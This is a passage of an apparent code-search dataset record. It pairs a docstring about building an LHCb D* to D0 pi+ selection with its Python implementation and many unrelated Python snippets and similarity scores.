namespace\n if cmds.objExists(characterNode + \".namespace\"):\n namespace = cmds.getAttr(characterNode + \".namespace\") + \":\"\n else:\n namespace = \"\"\n\n # pass in the network node and the namespace\n picker = moduleInst.pickerUI(scene.sceneRect().center(), self.pickerUI, module, namespace)\n scene.addItem(picker[0])\n self.pickerUI.selectionScriptJobs.append(picker[2])\n\n # =======================================================================\n # #mirror the module's pickerBorderItem if needed\n # =======================================================================\n if picker[1] == True:\n picker[0].setTransformOriginPoint(picker[0].boundingRect().center())\n picker[0].setTransform(QtGui.QTransform(-1.0, 0.0, 0.0, 1.0, picker[0].boundingRect().width() * 2, 0.0))\n\n children = picker[0].childItems()\n if children is not None:\n self.mirrorChildren(children)\n\n row = self.moduleList.row(selected)\n self.moduleList.takeItem(row)", "def choices(symbols, k):\n return [R.choice(symbols) for _ in range(k)]", "def __call__(self) -> abjad.Selection:\n if (self._repetition_chance == 0.0\n or random.random() > self._repetition_chance):\n if not self._is_first_window or self._process_on_first_call:\n if self._mode == 'out':\n self._remove_element()\n else:\n self._add_element()\n elif not self._include_empty_measures and self._mode == 'in':\n self._add_element()\n self._mask_to_selection()\n return self.current_window", "def pi(self):\n return self(self._real_field().pi())", "def select(self, test):\n survivors = []\n for particle in self.particles:\n # Find the originating particle\n parent = particle\n while parent.origin is not None:\n parent = parent.origin.initial_state[0]\n if test(parent, particle) is True:\n survivors.append(particle)\n return ParticleCollection(survivors)", "def __init__(self, k=1):\n self.k = k\n self.x = None\n self.y = None\n self.classes_ = None", "def pick(self):\n\n pickerdict = {}\n current_value = 0\n\n if len(self.choices) == 0:\n return None\n\n if len(self.choices) == 1:\n return self.choices[0][0]\n\n for option in self.choices:\n pickerdict[current_value] = option[0]\n current_value += option[1]\n\n picker = random.randint(0, current_value)\n last_value = 0\n result = None\n sorted_keys = sorted(pickerdict.keys())\n\n found = False\n for key in sorted_keys:\n if key >= picker:\n result = pickerdict[last_value]\n found = True\n continue\n last_value = key\n\n if not found:\n result = pickerdict[sorted_keys[-1]]\n\n return result", "def __init__(self, r1=4.5*0.0254, r2=4.5*0.0254,\n d1=25.0*0.0254, d2=25.0*0.0254,\n Ixx=185000.0*0.45359237*0.0254**2,\n Iyy=185000.0*0.45359237*0.0254**2,\n Izz=3500.0*0.45359237*0.0254**2,):\n self.r1 = r1 # m\n self.r2 = r2 # m\n self.d1 = d1 # m\n self.d2 = d2 # m\n self.Ixx = Ixx # kg-m^2\n self.Iyy = Iyy # kg-m^2\n self.Izz = Izz # kg-m^2", "def _write_selec(parameters):\n # Load data\n from ._common import selections\n\n data = deepcopy(selections)\n if parameters[\"selections\"][\"integers\"]:\n data[\"integers\"].update(parameters[\"selections\"][\"integers\"])\n if len(parameters[\"selections\"][\"floats\"]):\n data[\"floats\"] = parameters[\"selections\"][\"floats\"]\n\n # Check floats and overwrite IE(1)\n if data[\"floats\"] is not None and len(data[\"floats\"]):\n if isinstance(data[\"floats\"][0], (list, tuple, numpy.ndarray)):\n for x in data[\"floats\"]:\n if len(x) > 8:\n raise ValueError()\n\n data[\"integers\"][1] = len(data[\"floats\"])\n ndim = 2\n\n else:\n if len(data[\"floats\"]) > 8:\n raise ValueError()\n\n data[\"integers\"][1] = 1\n ndim = 1\n else:\n ndim = None\n\n # Formats\n fmt = block_to_format[\"SELEC\"]\n fmt1 = str2format(fmt[1])\n fmt2 = str2format(fmt[2])\n\n # Record 1\n values = [data[\"integers\"][k] for k in sorted(data[\"integers\"].keys())]\n out = write_record(values, fmt1)\n\n # Record 2\n if ndim == 1:\n out += write_record(data[\"floats\"], fmt2)\n elif ndim == 2:\n for x in data[\"floats\"]:\n out += write_record(x, fmt2)\n\n return out", "def ImagePointPicker(img, pts = 4, **kwargs):\n\timgpicker = __ImgPicker(img, pts, **kwargs)\n\treturn imgpicker.pickedPoints", "def pairing_group_create(curve='MNT224'):\n return PairingGroup(curve)", "def _selection(self, evaluations, selection, method=\"truncated\", best_rate=0.2):\n\n if selection:\n end_range_for_parents = max(1, int(self.population_size * best_rate))\n evaluations_sorted = torch.sort(evaluations)\n population_sorted = self.population[evaluations_sorted[1]]\n\n if self.best_individual is None:\n self.best_individual = population_sorted[0]\n self.best_eval = evaluations_sorted[0][0]\n elif self.best_eval > evaluations_sorted[0][0]:\n self.best_individual = population_sorted[0]\n self.best_eval = evaluations_sorted[0][0]\n best_population = torch.zeros([end_range_for_parents, len(self.population[0])], device=self.device)\n if method == \"truncated\":\n \"\"\"\n returns best individuals\n \"\"\"\n best_population = population_sorted[:end_range_for_parents]\n elif method == \"fitness_based\":\n \"\"\"\n probability of each individual to be selected is proportional to its fitness value\n \"\"\"\n tot = sum(evaluations)\n probabilities = evaluations / tot\n for i in range(end_range_for_parents):\n best_idx = torch.distributions.categorical.Categorical(\n probabilities.clone().detach()).sample()\n best_population[i] = self.population[best_idx]\n # avoid repetitions\n probabilities[best_idx] = 0\n elif method == \"rank_based\":\n \"\"\"\n probability of each individual to be selected is proportional to its rank value\n \"\"\"\n tot = ((1 + len(evaluations)) / 2) * len(evaluations)\n ranks = torch.linspace(1, len(evaluations), steps=len(evaluations), device=self.device)\n sorted_probabilities = 1 - ranks / tot\n for i in range(end_range_for_parents):\n best_idx = torch.distributions.categorical.Categorical(\n sorted_probabilities).sample()\n best_population[i] = population_sorted[best_idx]\n # avoid repetitions\n sorted_probabilities[best_idx] = 0\n if self.elitism:\n best_population[end_range_for_parents - 1] = self.best_individual\n else:\n best_population = self.population\n return best_population", "def legalize_Select(optree):\n cond = optree.get_input(0)\n op0 = optree.get_input(1)\n op1 = optree.get_input(2)\n precision = optree.get_precision()\n if precision is None:\n Log.report(Log.Error, \"None precision for Select:\\n{}\", optree)\n if op0.get_precision().get_bit_size() != precision.get_bit_size():\n optree.set_input(\n 1,\n Conversion(\n op0,\n precision = precision\n )\n )\n if op1.get_precision().get_bit_size() != precision.get_bit_size():\n optree.set_input(\n 2,\n Conversion(\n op1,\n precision = optree.get_precision()\n )\n )\n return optree", "def pkj1pk(self,r,z=0):\n return M.sqrt(M.pi/2.0)/r*self.besselInt.besselInt(lambda k: self.delta(k/r, z)/M.sqrt(k),1.5,self.besselN,self.besselh)", "def get_computers_choice():\n choices = ['Rock', 'Paper', 'Scissors']\n choice_index = randint(0, 2)\n choice = choices[choice_index]\n return choice" ]
[ "0.656367", "0.60201555", "0.57468003", "0.55250317", "0.55029947", "0.54665506", "0.53652567", "0.5354767", "0.5222274", "0.52220505", "0.51531583", "0.51516193", "0.5116602", "0.50792444", "0.5024644", "0.5015439", "0.5015241", "0.49948704", "0.49836156", "0.49750015", "0.4951771", "0.49449685", "0.4906584", "0.48983282", "0.48919162", "0.4881866", "0.48805493", "0.48796737", "0.4878966", "0.4870896", "0.4869406", "0.48576924", "0.48564172", "0.48269144", "0.48269144", "0.48207635", "0.4819919", "0.48023215", "0.4798266", "0.47969383", "0.4794351", "0.47862366", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47753075", "0.47624794", "0.47552288", "0.47283903", "0.47145227", "0.4709548", "0.4709375", "0.47060424", "0.4697647", "0.46929917", "0.4691896", "0.46908948", "0.46864256", "0.4680707", "0.46544144", "0.4650397", "0.46420047", "0.4638613", "0.46379852", "0.46322453", "0.46207172", "0.46131504", "0.46101162", "0.4609979", "0.46062496", "0.46039546", "0.45991406", "0.45958832", "0.4595597", "0.45926937", "0.45913664", "0.4581859", "0.45817038", "0.4581605", "0.45802715", "0.4577448", "0.45723152", "0.45706654", "0.4566401", "0.45637488", "0.45570725", "0.45476562", "0.45474976", "0.45405734", "0.45391718", "0.45374203", "0.45328453", "0.45306256", "0.45269525", "0.45229387" ]
0.0
-1
Create and return a D+ > D pi+ Selection object.
def makeDstarPartial( name , config , DecayDescriptor , inputSel ) : daugCuts = "(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)" % locals()['config'] combCuts = "((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)" % locals()['config'] dstarCuts = "(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)" \ "& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)" % locals()['config'] _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = { "pi+" : daugCuts } , CombinationCut = combCuts , MotherCut = dstarCuts ) return Selection( name+'Sel', Algorithm = _Dstar, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def selectAdd(op):\n doc = op.GetDocument()\n doc.SetActiveObject(op, c4d.SELECTION_ADD)", "def get_gold_selection(self, pointer):\n raise NotImplementedError", "def makePseudoPsi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n _daugCuts = \"(PT> %(D0PtLoose)s*MeV)\" % locals()['config']\n _combCuts = \"(APT> %(D0PtLoose)s*MeV)\" % locals()['config']\n\n _Psi = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"D0\": _daugCuts }\n , CombinationCut = _combCuts\n , MotherCut = \"(VFASPF(VCHI2PDOF) < 10000)\"\n )\n\n return Selection( name+'Sel',\n Algorithm = _Psi,\n RequiredSelections = inputSel\n )", "def selectVertex(self, addToSelection: bool) -> None:\n ...", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def makeSelection(self, selection=\"\"):\n\n\t\tif selection == \"\":\n\t\t\tprint \"usage: makeSelection(selection)\"\n\n\t\tsel_string = self.parseMacros(selection)\n\n\t\t# --- split by \";\" --- #\n\t\ttmp = []\n\t\tcols = []\n\t\tcols = sel_string.split(\";\")\n\t\tfor col in cols:\n\t\t\tinverse = False\n\t\t\tif col == \"\":\n\t\t\t\tcontinue\n\n\t\t\ttmp = string.split(col, \"=\")\n\t\t\tif \"!\" in tmp[0]:\n\t\t\t\tinverse = True\n\n\t\t\tif \"resi\" in tmp[0]:\n\t\t\t\tself.parseResI(tmp[1])\n\t\t\t\tself.invresi = inverse\n\t\t\telif \"resn\" in tmp[0]:\n\t\t\t\tself.parseResN(tmp[1])\n\t\t\t\tself.invresn = inverse\n\t\t\telif \"name\" in tmp[0]:\n\t\t\t\tself.parseAtom(tmp[1])\n\t\t\t\tself.invatom = inverse\n\t\t\telif \"element\" in tmp[0]:\n\t\t\t\tself.parseElement(tmp[1])\n\t\t\t\tself.invelement = inverse\t\n\t\t\telif \"chain\" in tmp[0]:\n\t\t\t\tself.parseChain(tmp[1])\n\t\t\t\tself.invchain = inverse\n\t\t\telif \"type\" in tmp[0]:\n\t\t\t\tself.parseType(tmp[1])\n\t\t\t\tself.invtype = inverse\n\t\t\telif \"cat\" in tmp[0]:\n\t\t\t\tself.parseCat(tmp[1])\n\t\t\t\tself.invcat = inverse\n\t\t\telif \"atomid\" in tmp[0]:\n\t\t\t\tself.parseAtomid(tmp[1])\n\t\t\t\tself.invatomid = inverse\n\t\t\telif \"BB\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"CEN\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O , CB \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"SC\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = True\n\t\t\telif \"HET\" in tmp[0]:\n\t\t\t\tself.parseType(\"HETATM\")\n\t\t\t\tself.invtype = inverse\n\t\t\telse:\n\t\t\t\tprint \"unrecognized selector: \",tmp[0]\n\t\t\t\tsys.exit()", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def _add_selection ( self , nick , sel ) :\n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n if self.__selections_[ self.name()].has_key( nick ) :\n raise AttributeError , \"Selection '%s'already exists \" % nick\n \n self.__selections_[ self.name() ][ nick ] = sel\n \n return sel", "def selectAdd(node):\n node['selected'].setValue(True)", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def instantiateNewCmd(self):\n return QadGRIPSTRETCHCommandClass(self.plugIn)", "def add_new_to_sel(self):\n self.parent().do_new(keep_sel=True)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def addSelectedToCanvas(self):\n\n selected = self.moduleList.currentItem()\n module = selected.data(QtCore.Qt.UserRole)[0]\n\n index = self.pickerUI.characterTabs.currentIndex()\n widget = self.pickerUI.characterTabs.widget(index)\n characterNode = widget.property(\"charNode\")\n\n # get inst\n modType = cmds.getAttr(module + \".moduleType\")\n modName = cmds.getAttr(module + \".moduleName\")\n mod = __import__(\"RigModules.\" + modType, {}, {}, [modType])\n reload(mod)\n\n # get the class name from that module file (returns RigModules.ART_Root.ART_Root for example)\n moduleClass = getattr(mod, mod.className)\n\n # find the instance of that module\n moduleInst = moduleClass(self, modName)\n self.modules.append(moduleInst)\n\n scene = self.getCurrentCanvasTab()\n\n # find out if charNode has a namespace\n if cmds.objExists(characterNode + \".namespace\"):\n namespace = cmds.getAttr(characterNode + \".namespace\") + \":\"\n else:\n namespace = \"\"\n\n # pass in the network node and the namespace\n picker = moduleInst.pickerUI(scene.sceneRect().center(), self.pickerUI, module, namespace)\n scene.addItem(picker[0])\n self.pickerUI.selectionScriptJobs.append(picker[2])\n\n # =======================================================================\n # #mirror the module's pickerBorderItem if needed\n # =======================================================================\n if picker[1] == True:\n picker[0].setTransformOriginPoint(picker[0].boundingRect().center())\n picker[0].setTransform(QtGui.QTransform(-1.0, 0.0, 0.0, 1.0, picker[0].boundingRect().width() * 2, 0.0))\n\n children = picker[0].childItems()\n if children is not None:\n self.mirrorChildren(children)\n\n row = self.moduleList.row(selected)\n self.moduleList.takeItem(row)", "def select(*args, add: bool=True, addFirst: bool=True, all: bool=True, allDagObjects: bool=True,\n allDependencyNodes: bool=True, clear: bool=True, containerCentric: bool=True,\n deselect: bool=True, hierarchy: bool=True, noExpand: bool=True, replace: bool=True,\n symmetry: bool=True, symmetrySide: int=0, toggle: bool=True, visible: bool=True,\n **kwargs)->None:\n pass", "def select(self):\n\n return self.p[0], self.p[1]", "def db(r):\n ey = gQ(r)\n gR = b.tcl(\n 'global no_gizmo; set no_gizmo 1; in %s {%s -New} ; return [value [stack 0].name]' % (ey.fullName(), r.Class()))\n group = b.toNode('.'.join((ey.fullName(), gR)))\n group.setSelected(False)\n if ew(r):\n for node, gS in ew(r).iteritems():\n for c in gS:\n node.setInput(c, group)\n\n for c in range(r.inputs()):\n group.setInput(c, r.input(c))\n\n group.setXYpos(r.xpos(), r.ypos())\n group.readKnobs(r.writeKnobs(b.TO_SCRIPT))\n b.delete(r)\n return group", "def pass_selection_dR(self, dR):\n dR_max = self.cut_dict[self.sample_name][\"dR_cut\"]\n return self.pass_selection_val(val=dR, val_max=dR_max)", "def generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def get_selection(self, selection_name, format=None):", "def __call__(self) -> abjad.Selection:\n if (self._repetition_chance == 0.0\n or random.random() > self._repetition_chance):\n if not self._is_first_window or self._process_on_first_call:\n if self._mode == 'out':\n self._remove_element()\n else:\n self._add_element()\n elif not self._include_empty_measures and self._mode == 'in':\n self._add_element()\n self._mask_to_selection()\n return self.current_window", "def polySelect(*args, add: bool=True, addFirst: bool=True, asSelectString: bool=True, deselect:\n bool=True, edgeBorder: Union[int, List[int], bool]=0, edgeBorderPath:\n Union[List[int, int], List[List[int, int]], bool]=None, edgeBorderPattern:\n Union[List[int, int], List[List[int, int]], bool]=None, edgeLoop: Union[int,\n List[int], bool]=0, edgeLoopOrBorder: Union[int, List[int], bool]=0,\n edgeLoopOrBorderPattern: Union[List[int, int], List[List[int, int]], bool]=None,\n edgeLoopPath: Union[List[int, int], List[List[int, int]], bool]=None,\n edgeLoopPattern: Union[List[int, int], List[List[int, int]], bool]=None,\n edgeRing: Union[int, List[int], bool]=0, edgeRingPath: Union[List[int, int],\n List[List[int, int]], bool]=None, edgeRingPattern: Union[List[int, int],\n List[List[int, int]], bool]=None, edgeUVLoopOrBorder: Union[int, List[int],\n bool]=0, everyN: int=0, extendToShell: Union[int, List[int], bool]=0,\n noSelection: bool=True, replace: bool=True, shortestEdgePath: Union[List[int,\n int], List[List[int, int]], bool]=None, shortestEdgePathUV: Union[List[int, int],\n List[List[int, int]], bool]=None, shortestFacePath: Union[List[int, int],\n List[List[int, int]], bool]=None, toggle: bool=True, q=True, query=True,\n **kwargs)->Union[List[int], Any]:\n pass", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def new_piece(self):\n piece_type = pieces.PieceSelector.select_random_piece()\n return piece_type(game_config.NEXT_PIECE_POSX, game_config.NEXT_PIECE_POSY)", "def project(record, selected, pkey_name) -> StateDictInterface:\n if selected:\n keys = set(selected.keys()) | {pkey_name}\n return record.projection(keys)\n else:\n return record", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def select(self):\n pass", "def select(self):\n pass", "def get_next_gp(self):\n next_gp = self.gpf_core.get_next_gp()[2]\n next_gp.build_posterior()\n return DragonflyGP(next_gp, self.options)", "def newDragBtn(self, color, selected, name, parent, width, height, tabIndex):\n btn = drag.DragButton(color, selected, self, name ) #create new draggable button\n btn.setParent(parent)\n btn.resize(width, height)\n btn.show() #show button\n logger.info(\"new button: %s\" % name)\n\n #add to objects dictionary\n if selected != None:\n for i in selected:\n if(i in self.objects[tabIndex]):\n self.objects[tabIndex][str(i)].append(btn) #add to array of buttons\n else:\n self.objects[tabIndex][str(i)]=[btn] #create array of buttons\n logger.debug(self.objects)\n else:\n logger.error(\"nothing is being connected to button\")\n\n return btn", "def select(self, new_pop, new_vals):\n raise NotImplemented(\n \"Method `EvolutionaryAlgorithm.select` should be implemented in subclasses!\")", "def instantiateNewCmd(self):\n return QadSTRETCHCommandClass(self.plugIn)", "def create_gui(self):\n\n selectors_widgets = list()\n\n for n in range(4):\n\n selectors_widgets.append(wd.Dropdown(\n options={'': 0, 'Orange': 1, 'Red': 2, 'Blue': 3, 'Green': 4},\n value=0,\n disabled=False,\n layout={'width': '148px'}\n ))\n\n self.confirm_button.on_click(\n self.create_combination_and_rate_function())\n self.user_interact.children = [self.selectors, self.confirm_button]\n\n self.selectors.children = selectors_widgets", "def to_pda(self) -> \"pda.PDA\":\n state = pda.State(\"q\")\n pda_object_creator = PDAObjectCreator(self._terminals, self._variables)\n input_symbols = {pda_object_creator.get_symbol_from(x)\n for x in self._terminals}\n stack_alphabet = {pda_object_creator.get_stack_symbol_from(x)\n for x in self._terminals.union(self._variables)}\n start_stack_symbol = pda_object_creator.get_stack_symbol_from(\n self._start_symbol)\n new_pda = pda.PDA(states={state},\n input_symbols=input_symbols,\n stack_alphabet=stack_alphabet,\n start_state=state,\n start_stack_symbol=start_stack_symbol)\n for production in self._productions:\n new_pda.add_transition(state, pda.Epsilon(),\n pda_object_creator.get_stack_symbol_from(\n production.head),\n state,\n [pda_object_creator.get_stack_symbol_from(x)\n for x in production.body])\n for terminal in self._terminals:\n new_pda.add_transition(state,\n pda_object_creator.get_symbol_from(\n terminal),\n pda_object_creator.get_stack_symbol_from(\n terminal),\n state, [])\n return new_pda", "def _create_features_dropdown(self, name=_features_dropdown):\n fts = sorted(self.features)\n d = Select(options=fts, css_classes=[self._features_dropdown], name=name)\n return d", "def _getAsSelection(self):\n return self._asSelection", "def softSelect(*args, compressUndo: Union[int, bool]=0, enableFalseColor: Union[int, bool]=0,\n softSelectColorCurve: Union[AnyStr, bool]=\"\", softSelectCurve: Union[AnyStr,\n bool]=\"\", softSelectDistance: Union[float, bool]=0.0, softSelectEnabled:\n Union[int, bool]=0, softSelectFalloff: Union[int, bool]=0, softSelectReset:\n bool=True, softSelectUVDistance: Union[float, bool]=0.0, q=True, query=True,\n e=True, edit=True, **kwargs)->Union[None, Any]:\n pass", "def select(self):\r\n pass", "def createGraphPoint(self, cls, newId):\n def getUniqueId(container, base):\n ids = set(container.objectIds())\n new = base\n i = 2\n while new in ids:\n new = '%s%s' % (base, i)\n i += 1\n return new\n newId = getUniqueId(self.graphPoints, newId)\n gp = cls(newId)\n # Set sequence\n if gp.isThreshold:\n gp.sequence = -1\n else:\n gp.sequence = len(self.graphPoints())\n # Set legend for graph points on multigraph reports\n if self.report() and hasattr(gp, 'legend'):\n # For MultiGraphReports we use a fancier legend\n # to differentiate when you have multiple devices/graphpoints\n # on a single graph\n gp.legend = gp.DEFAULT_MULTIGRAPH_LEGEND\n self.graphPoints._setObject(gp.id, gp)\n gp = self.graphPoints._getOb(gp.id)\n if gp.sequence == -1:\n self.manage_resequenceGraphPoints()\n return gp", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = 